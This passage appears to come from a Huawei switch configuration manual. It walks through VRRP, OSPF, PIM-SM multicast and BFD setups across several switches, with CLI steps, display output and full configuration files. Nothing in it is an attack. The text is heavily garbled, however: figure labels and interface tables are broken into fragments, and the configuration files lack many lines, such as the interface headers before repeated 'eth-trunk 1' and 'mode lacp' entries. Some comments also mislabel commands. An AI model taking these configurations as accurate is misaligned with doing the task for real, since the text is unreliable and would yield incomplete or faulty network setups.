Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Create time : 2012-05-11 11:39:18
Last change time : 2012-05-26 14:12:38


SwitchA restores to be the master and SwitchB the backup, and the associated interface is in
Up state.
State : Master
PriorityRun : 120
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
IF state : UP
IF state : UP
Create time : 2012-05-11 11:39:18
Last change time : 2012-05-26 14:17:36
State : Backup
PriorityRun : 100
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Create time : 2012-05-11 11:39:18
Last change time : 2012-05-26 14:17:36
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 11 to 15 101 to 180 301 to 305 400
#
stp disable
#
vlan 11
aggregate-vlan
vlan 12
aggregate-vlan
vlan 13
aggregate-vlan

vlan 14
aggregate-vlan
vlan 15
aggregate-vlan
#
interface Vlanif11
ip address 10.1.1.2 255.255.255.0
#
interface Vlanif12
ip address 10.1.2.2 255.255.255.0
#
interface Vlanif13
ip address 10.1.3.2 255.255.255.0
#
interface Vlanif14
ip address 10.1.4.2 255.255.255.0
#
interface Vlanif15
ip address 10.1.5.2 255.255.255.0
#
interface Vlanif400
ip address 192.168.1.1 255.255.255.0
#
mode lacp
#
#


#
eth-trunk 1
#
eth-trunk 1
#
ospf 1
area 0.0.0.0
network 10.1.1.0 0.0.0.255
network 10.1.2.0 0.0.0.255
network 10.1.3.0 0.0.0.255
network 10.1.4.0 0.0.0.255
network 10.1.5.0 0.0.0.255
network 192.168.1.0 0.0.0.255
#
return
#
sysname SwitchB
#
vlan batch 11 to 15 101 to 180 200 301 to 305
#
stp disable
#
vlan 11
aggregate-vlan
vlan 12
aggregate-vlan
vlan 13
aggregate-vlan
vlan 14
aggregate-vlan
vlan 15
aggregate-vlan
#
interface Vlanif11
ip address 10.1.1.3 255.255.255.0
#
interface Vlanif12
ip address 10.1.2.3 255.255.255.0
#
interface Vlanif13
ip address 10.1.3.3 255.255.255.0
#
interface Vlanif14
ip address 10.1.4.3 255.255.255.0
#
interface Vlanif15
ip address 10.1.5.3 255.255.255.0
#
interface Vlanif200
ip address 192.168.2.1 255.255.255.0

#
mode lacp
#
#
#
eth-trunk 1
#
eth-trunk 1
#
ospf 1
area 0.0.0.0
network 10.1.1.0 0.0.0.255
network 10.1.2.0 0.0.0.255
network 10.1.3.0 0.0.0.255
network 10.1.4.0 0.0.0.255
network 10.1.5.0 0.0.0.255
network 192.168.2.0 0.0.0.255
#
return
#
sysname SwitchC
#
#
stp disable
#
interface Vlanif200
ip address 192.168.2.2 255.255.255.0
#
interface Vlanif300
ip address 172.16.1.1 255.255.255.0
#
interface Vlanif400
ip address 192.168.1.2 255.255.255.0
#
#
#
#
ospf 1
area 0.0.0.0
network 172.16.1.0 0.0.0.255
network 192.168.1.0 0.0.0.255

network 192.168.2.0 0.0.0.255

#
return

#
sysname Switch
#
#
stp disable
#
#
#
return
11.1.5 Example for Configuring VRRP to Ensure Reliable

Multicast Data Transmission
VRRP Overview
Configuring multiple egress gateways is a commonly used method to improve system
reliability. However, route selection between the gateways becomes an issue.
address to implement gateway backup. When the gateway fails, VRRP selects a new gateway
to transmit service traffic to ensure reliable communication.
Configuration Notes
l VRRP groups must use different virtual IP addresses. The virtual IP address of a VRRP
group must be on the same network segment as the IP address of the interface where the
VRRP group is configured.
As shown in Figure 11-5, SwitchA and SwitchB are egress gateways of the campus network;
SwitchC and SwitchD are core switches. The multicast source connects to the campus
network through a router. Key nodes on the network work in redundancy mode to improve
network reliability, and the egress gateways and core switches are fully meshed to implement
link redundancy. The egress gateways and core switches must be configured to enable
multicast data to be reliably transmitted to the downstream network.

NOTE
Figure 11-5 Transmitting multicast data over a VRRP network

S o u rce
IP n e tw o rk
V R R P V R ID 1
V irtu a l IP A d d re ss
1 0 .1 .1 .2 5 3
V R R P V R ID 2 S w itch B
V irtu a l IP A d d re ss G E 1 /0 /0 G E 1 /0 /0
1 0 .1 .1 .2 5 4 G E 2 /0 /1 G E 2 /0 /1
L o o p b a ck1 L o o p b a ck1
1 0 .1 0 .1 .1 /3 2 G E 2 /0 /2 G E 2 /0 /2 1 0 .2 .2 .2 /3 2
G E 3 /0 /1 G G E 2 /0 /3 G E 2 /0 /3
E3 /2
C a m p u s e g re ss /0 /0 G E 3 /0 /1
S w itch A /2 E3
G
G
/2 E3
S w itch C 0 /0
C o re la ye r
E 3/ / 2 G E 3 /0 /1
G E 3 /0 /1 G G E 2 /0 /1 G E 2 /0 /1
L o o p b a ck1 G E 2 /0 /2 G E 2 /0 /2 L o o p b a ck1
1 0 .3 .3 .3 /3 2 1 0 .4 .4 .4 /3 2
V R R P V R ID 1 G E 2 /0 /3 G E 2 /0 /3
G E 1 /0 /0 G E 1 /0 /0
1 0 .1 .6 .2 5 3 S w itch D
V R R P V R ID 2
1 0 .1 .6 .2 5 4
A g g re g a tio n la ye r
A cce ss la ye r
A p p lica tio n la ye r
H o stA H o stB
E th -T ru n k in te rfa ce
D Interface VLA VLANIF De Interface VLAN VLANIF

e N Interface vic Interfac
vi IP e e IP
ce Address Address
S GE1/0/0 VLA 10.1.1.1/2 Swi GE1/0/0 VLAN 10.1.6.1/

wi N 4 tch 400 24
tc 100 C
h
A

D Interface VLA VLANIF De Interface VLAN VLANIF

e N Interface vic Interfac
vi IP e e IP
ce Address Address
Eth-trunk 1 VLA No Eth-trunk 2 VLAN No

(with member N VLANIF (with member 500 VLANIF
interfaces 200 interface interfaces interface
GE2/0/1, GE2/0/1,
GE2/0/2, and GE2/0/2, and
GE2/0/3) GE2/0/3)
GE3/0/1 VLA 10.1.2.1/2 GE3/0/1 VLAN 10.1.2.2/

N 4 301 24
301
GE3/0/2 VLA 10.1.3.1/2 GE3/0/2 VLAN 10.1.5.2/

N 4 304 24
302
S GE1/0/0 VLA 10.1.1.2/2 Swi GE1/0/0 VLAN 10.1.6.2/

wi N 4 tch 400 24
tc 100 D
h
B Eth-trunk 1 VLA No Eth-trunk 2 VLAN No
(with member N VLANIF (with member 500 VLANIF
interfaces 200 interface interfaces interface
GE2/0/1, GE2/0/1,
GE2/0/2, and GE2/0/2, and
GE2/0/3) GE2/0/3)
GE3/0/1 VLA 10.1.4.1/2 GE3/0/1 VLAN 10.1.4.2/

N 4 303 24
303
GE3/0/2 VLA 10.1.5.1/2 GE3/0/2 VLAN 10.1.3.2/

N 4 302 24
304
To ensure reliable multicast data transmission, configure the Virtual Router Redundancy
Protocol (VRRP) and Bidirectional Forwarding Detection (BFD) on the egress gateways and
core switches. To ensure normal multicast forwarding, configure a multicast protocol on the
egress gateways and core switches.
1. Configure link aggregation groups between SwitchA and SwitchB, and between SwitchC
and SwitchD to ensure fast and reliable exchange of VRRP packets.
2. Create VLANs on the switches and add their interfaces to respective VLANs. Configure
IP addresses for the corresponding VLANIF interfaces to make local network segments
reachable.
3. Configure the Open Shortest Path First (OSPF) protocol on the switches to ensure
reachable routes between them. OSPF routes load balance unicast traffic between the

egress gateways and core switches to reduce loads of links that transmit multicast and
unicast data simultaneously.
4. Configure a VRRP group between SwitchA and SwitchB and a VRRP group between
SwitchC and SwitchD to ensure reliable multicast forwarding. The VRRP groups
implement load balancing for unicast traffic to reduce loads of links that transmit
multicast and unicast data simultaneously.
5. Configure a multicast protocol on the switches to ensure normal multicast data
forwarding.
6. Configure BFD for OSPF and BFD for PIM on the switches to enable the switches to
quickly detect link failures, realizing fast convergence of unicast and multicast routes.
Procedure
1. Configure link aggregation groups on the switches.
# Create Eth-Trunks and add member interfaces to the Eth-Trunks on the campus egress
gateway and core devices.
<SwitchA> system-view
[SwitchA] interface Eth-Trunk1 //Create Eth-Trunk1 and bind member
interfaces GE2/0/1 through GE2/0/3 to it.
[SwitchA-Eth-Trunk1] trunkport gigabitethernet 2/0/1 to 2/0/3
<SwitchB> system-view
[SwitchB] interface Eth-Trunk1 //Create Eth-Trunk1 and bind member
[SwitchB-Eth-Trunk1] trunkport gigabitethernet 2/0/1 to 2/0/3
[SwitchC] interface Eth-Trunk1 //Create Eth-Trunk1 and bind member
[SwitchC-Eth-Trunk1] trunkport gigabitethernet 2/0/1 to 2/0/3
[SwitchC-Eth-Trunk1] quit
[SwitchD] interface Eth-Trunk1 //Create Eth-Trunk1 and bind member
[SwitchD-Eth-Trunk1] trunkport gigabitethernet 2/0/1 to 2/0/3
[SwitchD-Eth-Trunk1] quit
By default, an Eth-Trunk works in manual load balancing mode, and all active interfaces
load balance traffic.
2. Create VLANs, add interfaces to respective VLANs, and configure IP addresses for
corresponding VLANIF interfaces.
a. Create VLANs and add interfaces to the VLANs on the campus egress gateway and
core devices. The configurations on SwitchB, SwitchC, and SwitchD are similar to
the configuration on SwitchA, and are not mentioned here.
[SwitchA] vlan batch 100 200 301 302
[SwitchA-GigabitEthernet1/0/0] port link-type trunk //Set the link
type of the interface to trunk, which is not the default link type.


[SwitchA-Eth-Trunk1] port link-type trunk //Set the link type of the
interface to trunk, which is not the default link type.
[SwitchA-Eth-Trunk1] port trunk allow-pass vlan 200
b. Configure IP addresses for Layer 3 interfaces on the campus egress gateway and
core devices. The configurations on SwitchB, SwitchC, and SwitchD are similar to
the configuration on SwitchA, and are not mentioned here.
[SwitchA] interface vlanif 100 //Create VLANIF100.
[SwitchA] interface loopback 1 //Create LoopBack1.
[SwitchA-LoopBack1] ip address 10.10.1.1 32
3. Configure OSPF.
# Enable OSPF on the campus egress gateway and core devices, add the devices to area
0, and advertise local network segments in area 0. The configurations on SwitchB,
SwitchC, and SwitchD are similar to the configuration on SwitchA, and are not
mentioned here.
[SwitchA] ospf
[SwitchA-ospf-1-area-0.0.0.0] network 10.1.1.0 0.0.0.255 //Specify that
the interface running OSPF is the one connected to the 10.1.1.0 network
segment and that the interface belongs to Area 0.
4. Configure VRRP groups.

a. Create VRRP group 1 on campus egress gateway devices SwitchA and SwitchB.
Set the priority of SwitchA to 120 and the preemption delay to 20 seconds. Retain
the default priority of SwitchB. Therefore, SwitchA becomes the master device and
SwitchB becomes the backup device of VRRP group 1.
[SwitchA-Vlanif100] vrrp vrid 1 virtual-ip 10.1.1.253 //Create VRRP
group 1 on VLANIF100 and set the virtual IP address of the VRRP group to
10.1.1.253.
[SwitchA-Vlanif100] vrrp vrid 1 priority 120 //Set the priority of
VLANIF100 in VRRP group 1 to 120.
[SwitchA-Vlanif100] vrrp vrid 1 preempt-mode timer delay 20 //Set
the preemption delay of VLANIF100 in VRRP group 1 to 20 seconds.
[SwitchB-Vlanif100] vrrp vrid 1 virtual-ip 10.1.1.253 //Create VRRP

10.1.1.253.
b. Create VRRP group 2 on campus egress gateway devices SwitchA and SwitchB.
Set the priority of SwitchB to 120 and the preemption delay to 20 seconds. Retain
the default priority of SwitchA. Therefore, SwitchB becomes the master device and
SwitchA becomes the backup device of VRRP group 1.
[SwitchA-Vlanif100] vrrp vrid 2 virtual-ip 10.1.1.254 //Create VRRP
10.1.1.254.
[SwitchB-Vlanif100] vrrp vrid 2 virtual-ip 10.1.1.254 //Create VRRP
10.1.1.254.
[SwitchB-Vlanif100] vrrp vrid 2 priority 120 //Set the priority of
VLANIF100 in VRRP group 2 to 120.
[SwitchB-Vlanif100] vrrp vrid 2 preempt-mode timer delay 20 //Set
the preemption delay of VLANIF100 in VRRP group 2 to 20 seconds.
The configurations on SwitchC and SwitchD are similar to the configurations on

SwitchA and SwitchB, and are not mentioned here.
5. Configure a multicast protocol.
a. Enable multicast routing on the campus egress gateway and core devices, and
enable PIM-SM on their Layer 3 interfaces. Enable IGMP on user-side interfaces of
the core devices.
[SwitchA] multicast routing-enable //Enable multicast routing
globally.
[SwitchA-Vlanif100] pim sm //Enable PIM-SM on VLANIF100.
[SwitchA] interface loopback 1
[SwitchA-LoopBack1] pim sm //Enable PIM-SM on LoopBack1.
[SwitchB] multicast routing-enable //Enable multicast routing
globally.
[SwitchB-Vlanif100] pim sm //Enable PIM-SM on VLANIF100.
[SwitchB] interface loopback 1
[SwitchB-LoopBack1] pim sm //Enable PIM-SM on LoopBack1.
[SwitchB-LoopBack1] quit

[SwitchC] multicast routing-enable //Enable multicast routing

globally.
[SwitchC-Vlanif400] pim sm //Enable PIM-SM on VLANIF400.
[SwitchC-Vlanif400] igmp enable //Enable PIM-SM on VLANIF400.
[SwitchC] interface loopback 1
[SwitchC-LoopBack1] pim sm //Enable PIM-SM on LoopBack1.
[SwitchC-LoopBack1] quit
[SwitchD] multicast routing-enable //Enable multicast routing
globally.
[SwitchD-Vlanif400] pim sm //Enable PIM-SM on VLANIF400.
[SwitchD-Vlanif400] igmp enable //Enable IGMP on VLANIF400.
[SwitchD] interface loopback 1
[SwitchD-LoopBack1] pim sm //Enable PIM-SM on LoopBack1.
[SwitchD-LoopBack1] quit
b. Configure dynamic RP function on the core devices SwitchC and SwitchD that
aggregate multicast traffic.
# Configure Loopback1 of SwitchC as a C-BSR and a C-RP.
[SwitchC] pim
[SwitchC-pim] c-bsr loopback 1 //Configure Loopback1 as a C-BSR
interface.
[SwitchC-pim] c-rp loopback 1 //Configure Loopback1 as a C-RP
interface.
[SwitchC-pim] quit
# Configure Loopback1 of SwitchD as a C-BSR and a C-RP.

[SwitchD] pim
[SwitchD-pim] c-bsr loopback 1 //Configure Loopback1 as a C-BSR
interface.
[SwitchD-pim] c-rp loopback 1 //Configure Loopback1 as a C-RP
interface.
[SwitchD-pim] quit
6. Configure BFD.
a. Enable global BFD on the campus egress gateway and core devices. Global BFD
must be enabled before you configure BFD for OSPF and BFD for PIM. The
configurations on SwitchB, SwitchC, and SwitchD are similar to the configuration
on SwitchA, and are not mentioned here.
[SwitchA-bfd] quit
b. Enable BFD for OSPF on the campus egress gateway and core devices. The
[SwitchA-Vlanif100] ospf bfd enable //Enable BFD for OSPF on
VLANIF100.


VLANIF301.
VLANIF302.
c. Enable BFD for PIM on the campus egress gateway and core devices. The
[SwitchA-Vlanif100] pim bfd enable //Enable BFD for PIM on VLANIF100.

– Verify the configuration of link aggregation.
# Run the display eth-trunk 1 command on SwitchA. The command output shows
that Eth-Trunk 1 has three member interfaces: GigabitEthernet2/0/1,
GigabitEthernet2/0/2, and GigabitEthernet2/0/3. All the member interfaces are Up.
WorkingMode: NORMAL Hash arithmetic: According to SIP-XOR-DIP
Least Active-linknumber: 1 Max Bandwidth-affected-linknumber: 8
Operate status: up Number Of Up Ports In Trunk: 3
-------------------------------------------------------------------------
-------
The display eth-trunk 1 command outputs on SwitchB, SwitchC, and SwitchD are
similar to the command output on SwitchA.
– Verify the VRRP configuration.
# Run the display vrrp command on SwitchA. The command output shows that
SwitchA is the master device in VRRP group 1 and the backup device in VRRP
group 2.
State : Master
Virtual IP : 10.1.1.253
PriorityRun : 120
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Create time : 2012-12-31 10:34:23 UTC-08:00


State : Backup
Virtual IP : 10.1.1.254
PriorityRun : 100
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0102
Check TTL : YES
Create time : 2012-12-31 10:35:39 UTC-08:00
# Run the display vrrp command on SwitchB. The command output shows that
SwitchB is the backup device in VRRP group 1 and the master device in VRRP
group 2.
State : Backup
Virtual IP : 10.1.1.253
PriorityRun : 100
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Create time : 2012-12-31 10:34:23 UTC-08:00

State : Master
Virtual IP : 10.1.1.254
PriorityRun : 120
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0102
Check TTL : YES
Create time : 2012-12-31 10:35:39 UTC-08:00
The display vrrp command outputs on SwitchC and SwitchD are similar to the
command outputs on SwitchA and SwitchB.
– Verify the OSPF configuration.
# Run the display ip routing-table command on SwitchA. The command output
shows that there are two IP routes to 10.1.6.0/24, implementing load balancing of
unicast traffic.
-------------------------------------------------------------------------

-----
Destination/Mask Proto Pre Cost Flags NextHop

Interface
10.1.1.0/24 Direct 0 0 D 10.1.1.1

Vlanif100
10.1.1.1/32 Direct 0 0 D 127.0.0.1
Vlanif100
10.1.1.253/32 Direct 0 0 D 127.0.0.1
Vlanif100
10.1.1.254/32 Direct 0 0 D 127.0.0.1
Vlanif100
10.1.2.0/24 Direct 0 0 D 10.1.2.1
Vlanif301
10.1.2.1/32 Direct 0 0 D 127.0.0.1
Vlanif301
10.1.3.0/24 Direct 0 0 D 10.1.3.1
Vlanif302
10.1.3.1/32 Direct 0 0 D 127.0.0.1
Vlanif302
10.1.4.0/24 OSPF 10 2 D 10.1.3.2
Vlanif302
10.1.5.0/24 OSPF 10 2 D 10.1.2.2
Vlanif301
10.1.6.0/24 OSPF 10 2 D 10.1.2.2 Vlanif301
OSPF 10 2 D 10.1.3.2
Vlanif302
10.1.6.253/32 OSPF 10 2 D 10.1.2.2
Vlanif301
OSPF 10 2 D 10.1.3.2
Vlanif302
10.1.6.254/32 OSPF 10 2 D 10.1.3.2
Vlanif302
OSPF 10 2 D 10.1.2.2
Vlanif301
127.0.0.0/8 Direct 0 0 D 127.0.0.1
InLoopBack0
127.0.0.1/32 Direct 0 0 D 127.0.0.1
InLoopBack0
The display ip routing-table command outputs on SwitchB, SwitchC, and

SwitchD are similar to the command output on SwitchA.
– Verify PIM-SM configuration.
Multicast source 10.100.1.1 sends multicast data to group 225.0.0.10, and user hosts
have joined group 225.0.0.10.
# Run the display pim routing-table command on SwitchB and SwitchD. The
command output shows that PIM routing entries have been created for group
225.0.0.10.
NOTE
SwitchB and SwitchD implement multicast routing as follows:

l According to the dynamic RP election rules, C-RP interfaces have the same IP address
mask, priority, and hash calculation result, the C-RP interface with a larger IP address
becomes the RP. Therefore, Loopback1 of SwitchD becomes the RP interface.
l According to the reverse path check (RPF) rules, if two equal-cost optimal routes are
available in the IP routing table, the one with a larger next hop address is selected as the
RPF route. Therefore, SwitchD selects the route with the next hop address 10.1.5.1 as
the RPF route to the destination network segment 10.1.1.0/24.
[SwitchB] display pim routing-table
VPN-Instance: public net
Total 0 (*, G) entry; 1 (S, G) entry

(10.100.1.1, 225.0.0.10)
RP: 10.4.4.4
Protocol: pim-sm, Flag: SPT ACT
UpTime: 00:00:42
Upstream interface: Vlanif100
Upstream neighbor: 10.1.1.3
RPF prime neighbor: 10.1.1.3
Downstream interface(s) information:
Total number of downstreams: 1
1: Vlanif303
Protocol: pim-sm, UpTime: 00:00:42, Expires:-
[SwitchD] display pim routing-table
Total 0 (*, G) entry; 1 (S, G) entry
(10.100.1.1, 225.0.0.10)
RP: 10.4.4.4
Protocol: pim-sm, Flag: SPT ACT
UpTime: 00:00:42
Upstream interface: Vlanif303
Upstream neighbor: 10.1.4.1
RPF prime neighbor: 10.1.4.1
Downstream interface(s) information:
Total number of downstreams: 1
1: Vlanif400
Protocol: pim-sm, UpTime: 00:00:42, Expires:-
– Verify the BFD configuration.

# Run the display ospf bfd session all command on SwitchA. The command output
shows that OSPF BFD sessions have been successfully set up.
[SwitchA] display ospf bfd session all
NeighborId:10.2.2.2 AreaId:0.0.0.0 Interface:

Vlanif100
NeighborId:5.5.5.5 AreaId:0.0.0.0 Interface: Vlanif100


Vlanif301

Vlanif302
The display ospf bfd session all command outputs on SwitchB, SwitchC, and
SwitchD are similar to the command output on SwitchA.

# Run the display pim bfd session command on SwitchA. The command output
shows that PIM BFD sessions have been successfully set up.
[SwitchA] display pim bfd session
Total 4 BFD session Created
Vlanif100 (10.1.1.1): Total 2 BFD session Created
Neighbor ActTx(ms) ActRx(ms) ActMulti Local/Remote

State
10.1.1.2 1000 1000 3 8192/8192
Up
10.1.1.3 1000 1000 3 8191/8191
Up

State
10.1.2.2 1000 1000 3 8193/8193
Up

State
10.1.3.2 1000 1000 3 8194/8194
Up
The display pim bfd session command outputs on SwitchB, SwitchC, and SwitchD
are similar to the command output on SwitchA.
Configuration Files
l Configuration file of campus egress gateway SwitchA
#
sysname SwitchA
#
vlan batch 100 200 301 to 302
#
multicast routing-enable
#
bfd
#
interface Vlanif100
ip address 10.1.1.1 255.255.255.0
pim sm
pim bfd enable
ospf bfd enable
#
interface Vlanif301
ip address 10.1.2.1 255.255.255.0
pim sm
pim bfd enable
ospf bfd enable
#
interface Vlanif302
ip address 10.1.3.1 255.255.255.0
pim sm
pim bfd enable
ospf bfd enable
#


#
#
eth-trunk 1
#
eth-trunk 1
#
eth-trunk 1
#
#
#
interface LoopBack1
ip address 10.10.1.1 255.255.255.255
pim sm
#
ospf 1
area 0.0.0.0
network 10.1.1.0 0.0.0.255
network 10.1.2.0 0.0.0.255
network 10.1.3.0 0.0.0.255
network 10.10.1.1 0.0.0.0
#
return
l Configuration file of campus egress gateway SwitchB
#
sysname SwitchB
#
vlan batch 100 200 303 to 304
#
#
bfd
#
interface Vlanif100
ip address 10.1.1.2 255.255.255.0
pim sm
pim bfd enable
ospf bfd enable
#
interface Vlanif303
ip address 10.1.4.1 255.255.255.0
pim sm
pim bfd enable
ospf bfd enable
#
interface Vlanif304
ip address 10.1.5.1 255.255.255.0
pim sm
pim bfd enable
ospf bfd enable
#


#
#
eth-trunk 1
#
eth-trunk 1
#
eth-trunk 1
#
#
#
interface LoopBack1
ip address 10.2.2.2 255.255.255.255
pim sm
#
ospf 1
area 0.0.0.0
network 10.1.1.0 0.0.0.255
network 10.1.4.0 0.0.0.255
network 10.1.5.0 0.0.0.255
network 10.2.2.2 0.0.0.0
#
return
l Configuration file of core device SwitchC
#
sysname SwitchC
#
vlan batch 301 304 400 500
#
#
bfd
#
interface Vlanif301
ip address 10.1.2.2 255.255.255.0
pim sm
pim bfd enable
ospf bfd enable
#
interface Vlanif304
ip address 10.1.5.2 255.255.255.0
pim sm
pim bfd enable
ospf bfd enable
#
interface Vlanif400
ip address 10.1.6.1 255.255.255.0
pim sm
pim bfd enable
igmp enable
ospf bfd enable
#


#
stp disable
#
eth-trunk 1
#
eth-trunk 1
#
eth-trunk 1
#
#
#
interface LoopBack1
ip address 10.3.3.3 255.255.255.255
pim sm
#
ospf 1
area 0.0.0.0
network 10.1.2.0 0.0.0.255
network 10.1.5.0 0.0.0.255
network 10.1.6.0 0.0.0.255
network 10.3.3.3 0.0.0.0
#
pim
c-bsr LoopBack1
c-rp LoopBack1
#
return
l Configuration file of core device SwitchD
#
sysname SwitchD
#
vlan batch 302 to 303 400 500
#
#
bfd
#
interface Vlanif302
ip address 10.1.3.2 255.255.255.0
pim sm
pim bfd enable
ospf bfd enable
#
interface Vlanif303
ip address 10.1.4.2 255.255.255.0
pim sm
pim bfd enable
ospf bfd enable
#
interface Vlanif400
ip address 10.1.6.2 255.255.255.0

pim sm
pim bfd enable
igmp enable
ospf bfd enable
#
#
stp disable
#
eth-trunk 1
#
eth-trunk 1
#
eth-trunk 1
#
#
#
interface LoopBack1
ip address 10.4.4.4 255.255.255.255
pim sm
#
ospf 1
area 0.0.0.0
network 10.1.3.0 0.0.0.255
network 10.1.4.0 0.0.0.255
network 10.1.6.0 0.0.0.255
network 10.4.4.4 0.0.0.0
#
pim
c-bsr LoopBack1
c-rp LoopBack1
#
return
11.2 Typical BFD Configuration
11.2.1 Example for Associating the BFD Session Status with the
Interface Status
BFD Overview
A network device must detect a communication fault between adjacent devices quickly so that
measures can be taken immediately and service interruptions can be prevented. In practice,
hardware detection is used to detect link faults. For example, Synchronous Digital Hierarchy
(SDH) alarms are used to report link faults. However, not all media can provide the hardware
detection mechanism. Applications use the Hello mechanism of the upper-layer routing

protocol to detect faults. The detection duration is more than 1 second, which is too long for
some applications. If no routing protocol is deployed on a small-scale Layer 3 network, the
Hello mechanism cannot be used.
BFD provides fast fault detection independent of media and routing protocols. With the
millisecond-level fault detection and switching, BFD is suitable for scenarios that are
sensitive to the packet loss and delay.
Configuration Notes
l The local discriminator of the local system and the remote discriminator of the remote
system must be the same. If the local discriminator of the local system and the remote
discriminator of the remote system are different, a static BFD session cannot be set up.
After the local discriminator and the remote discriminator are configured, you cannot
modify them.
l If a BFD session is bound to the default multicast address, the local discriminator and the
remote discriminator must be different.
l If the WTR time is set, set the same WTR time at both ends. Otherwise, when the BFD
session status changes at one end, applications at both ends detect different BFD session
statuses.

Prod Product Model Software Version
uct
S1270 S12708 and V200R005C00, V200R006C00, V200R007C00,

0 S12712 V200R007C20, V200R008C00, V200R009C00
S12704 V200R008C00, V200R009C00
NOTE
As shown in Figure 11-6, SwitchA is directly connected to SwitchB at the network layer and
Layer 2 transmission devices, SwitchC and SwitchD, are deployed between them. It is
required that SwitchA and SwitchB fast detect link faults of the Layer 2 transmission devices
to trigger fast route convergence.
Figure 11-6 Associating the BFD session status with the interface status
V L A IN F 1 0 V L A IN F 1 0
1 0 .1 .1 .1 /2 4 1 0 .1 .1 .2 /2 4
G E 1 /0 /1 G E 1 /0 /1
S w itc h A S w itc h C S w itc h D S w itc h B

1. Configure a BFD session on SwitchA and SwitchB to detect faults on the link between
SwitchA and SwitchB.
2. Configure association between the BFD session status and interface status on SwitchA
and SwitchB after the BFD session becomes Up.
Procedure
Step 1 Set IP addresses of the directly connected interfaces on SwitchA and SwitchB.
# Assign an IP address to the interface of SwitchA.
[SwitchA] vlan 10
[SwitchA-GigabitEthernet1/0/1] port link-type hybrid //In V200R005C00 and later
versions, the default link type of an interface is not hybrid, you need to
configure it manually.
# Assign an IP address to the interface of SwitchB.

[SwitchB] vlan 10
[SwitchA-GigabitEthernet1/0/1] port link-type hybrid //In V200R005C00 and later
versions, the default link type of an interface is not hybrid, you need to
configure it manually.
[SwitchB-GigabitEthernet1/0/1] port hybrid pvid vlan 10
[SwitchB-GigabitEthernet1/0/1] port hybrid untagged vlan 10
Step 2 Configure single-hop BFD.

# Enable BFD on SwitchA and establish a BFD session named atob between SwitchA and
SwitchB.
[SwitchA-bfd] quit
[SwitchA] bfd atob bind peer-ip default-ip interface gigabitethernet 1/0/1 //
Configure a BFD session named atob.
[SwitchA-bfd-session-atob] discriminator local 10 //Configure the local
distriminator of the BFD session.
[SwitchA-bfd-session-atob] discriminator remote 20 //Configure the remote
distriminator of the BFD session.
[SwitchA-bfd-session-atob] commit
# Enable BFD on SwitchB and establish a BFD session named btoa between SwitchB and
SwitchA.
[SwitchB] bfd
[SwitchB-bfd] quit
[SwitchB] bfd btoa bind peer-ip default-ip interface gigabitethernet 1/0/1 //
Configure a BFD session named btoa.

[SwitchB-bfd-session-btoa] discriminator local 20

[SwitchB-bfd-session-btoa] discriminator remote 10
[SwitchB-bfd-session-btoa] commit
# After the configuration is complete, run the display bfd session all verbose command on
SwitchA and SwitchB. You can see that a single-hop BFD session is set up and its status is
Up. The display on SwitchA is used as an example.
[SwitchA] display bfd session all verbose
--------------------------------------------------------------------------------
Session MIndex : 16384 (One Hop) State : Up Name : atob
--------------------------------------------------------------------------------
Local Discriminator : 10 Remote Discriminator : 20
Session Detect Mode : Asynchronous Mode Without Echo Function
BFD Bind Type : Interface(GigabitEthernet1/0/1)
Bind Session Type : Static
Bind Peer Ip Address : 224.0.0.184
NextHop Ip Address : 224.0.0.184
Bind Interface : GigabitEthernet1/0/1
FSM Board Id : 3 TOS-EXP : 7
Min Tx Interval (ms) : 1000 Min Rx Interval (ms) : 1000
Actual Tx Interval (ms): 1000 Actual Rx Interval (ms): 1000
Local Detect Multi : 3 Detect Interval (ms) : 3000
Echo Passive : Disable Acl Number : -
Destination Port : 3784 TTL : 255
Proc interface status : Disable Process PST : Disable
WTR Interval (ms) : -
Active Multi : 3
Last Local Diagnostic : No Diagnostic
Bind Application : No Application Bind
Session TX TmrID : - Session Detect TmrID : -
Session Init TmrID : - Session WTR TmrID : -
Session Echo Tx TmrID : -
PDT Index : FSM-0 | RCV-0 | IF-0 | TOKEN-0
Session Description : -
--------------------------------------------------------------------------------
Step 3 Configuring association between BFD session status and interface status.
# Configure association between the BFD session status and the interface status on SwitchA.
[SwitchA] bfd atob
[SwitchA-bfd-session-atob] process-interface-status
# Configure association between the BFD session status and the interface status on SwitchB.
[SwitchB] bfd btoa
[SwitchB-bfd-session-btoa] process-interface-status

After the configuration is complete, run the display bfd session all verbose command on
SwitchA and SwitchB. You can see that the Proc interface status field is Enable.
The display on SwitchA is used as an example.
--------------------------------------------------------------------------------
Session MIndex : 16384 (One Hop) State : Up Name : atob
--------------------------------------------------------------------------------


Proc interface status : Enable Process PST : Disable
Active Multi : 3
Last Local Diagnostic : No Diagnostic
Bind Application : IFNET
--------------------------------------------------------------------------------
Run the shutdown command on GE1/0/1 of SwitchB to make the BFD session go Down.
Run the display bfd session all verbose and display interface gigabitethernet 1/0/1
commands on SwitchA. You can see that the BFD session status is Down, and the status of
GE1/0/1 is UP (BFD status down).
--------------------------------------------------------------------------------
Session MIndex : 16384 (One Hop) State : Down Name : atob
--------------------------------------------------------------------------------
Proc interface status : Enable Process PST : Disable
Active Multi : 3
Last Local Diagnostic : Control Detection Time Expired
Bind Application : IFNET
--------------------------------------------------------------------------------

[SwitchA] display interface gigabitethernet 1/0/1
GigabitEthernet1/0/1 current state : UP
Line protocol current state : UP(BFD status down)
...

NOTE
The display interface gigabitethernet 1/0/1 command displays information that you need to concern
and "..." indicates that information is omitted.
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 10
#
bfd
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
#
#
bfd atob bind peer-ip default-ip interface GigabitEthernet1/0/1
process-interface-status
commit
#
return

#
sysname SwitchB
#
vlan batch 10
#
bfd
#
interface Vlanif10
ip address 10.1.1.2 255.255.255.0
#
port hybrid untagged vlan10
#
bfd btoa bind peer-ip default-ip interface GigabitEthernet1/0/1
process-interface-status
commit
